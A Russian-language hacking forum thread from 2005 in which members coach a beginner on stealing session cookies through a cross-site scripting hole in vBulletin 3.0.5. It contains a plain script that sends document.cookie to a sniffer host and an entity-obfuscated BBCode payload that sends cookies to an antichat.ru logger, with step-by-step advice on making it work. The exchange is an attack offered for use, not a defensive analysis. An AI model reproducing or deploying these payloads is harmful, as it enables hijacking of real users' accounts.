Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   XSS на Bulletin Version 3.0.5 (https://forum.antichat.xyz/showthread.php?t=11693)

Extrim 13.12.2005 00:09
XSS на Bulletin Version 3.0.5
 
Скажите пожалуста как код снифера встовлять в тему......
Вот например код
Код:
<script>img=new Image(); img.src="http://s.netsec.ru//s.gif?id=591&"+document.cookie;</script>
и все или что то надо менять в этом коде ???
Ответти мне на этот вопрос пожалуста..Я со снифером первый раз роботаю !

FQziT 13.12.2005 00:21
В какую тему и какого форума ты это вставлять собрался? Адрес твоего сниффера нужно вставлять в Код Xss специальный для твоей версии форума. А ЭТО просто пример того, как можно украсть куки, но долеко не та конструкция с помощью которой это надо делать=)) Скажи что за форум?

Extrim 13.12.2005 00:31
Powered by: vBulletin Version 3.0.5
Помогите плиз

FQziT 13.12.2005 01:02
Код HTML:
[URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/FONT][/url][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ][/FONT][/URL]
Вот попробуй. Только удали плюсы из спец. символов, чтобы работало. Закодирован пол сниффер античата.

Extrim 13.12.2005 01:16
***************************
PHP код:
[URL=wj[url]http://www.][FONT=Arial style=display:none; style=background:url(javascript:document.&+#105;m&+#97;ges[1].src="http:/&47;antichat&+#46;ru/cgi-&+#98;in/s.jpg?"+document.cookie;)  / ]wj [/url][/FONT][/URL] 
***********************************
Вот-так ??Я плюсы убрал...если нетак плиз розкажи как надо я просто хочю попробывать на зуб XSS

Romaxa55 13.12.2005 01:21
Ну все, вставляй и иди на лог античата. ток вроде плюсы не везде убрал

FQziT 13.12.2005 01:21
Цитата:
Вот-так ??Я плюсы убрал...
Мне что, за тебя плюсики уберать? И ГДЕ Ж ТЫ ПЛЮСЫ-ТО убрал????
Я сказал плюсы убрать только в спец. символах! Пример. Было &+#58, а становится просто &#58, понятно??? Я не знаю, как ещё проще объяснить....
Не забываем про репутацию

$ZLO$ 13.12.2005 01:37
а куда конкретно его вставлять в свой пост? и канает ли данная XSS в vBulletin v3.5.2 ?

FQziT 13.12.2005 01:50
Extrim Ты не все плюсы убрал!!! Со зрением чтоли плохо? Со второй попытки и то не все=)))
Цитата:
Сообщение от $ZLO$
канает ли данная XSS в vBulletin v3.5.2 ?
Нет.

cardons 13.12.2005 03:51
А у кого нить есть этот декодер,чтобы так же делать из букв в такие коды?


Время: 16:49
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице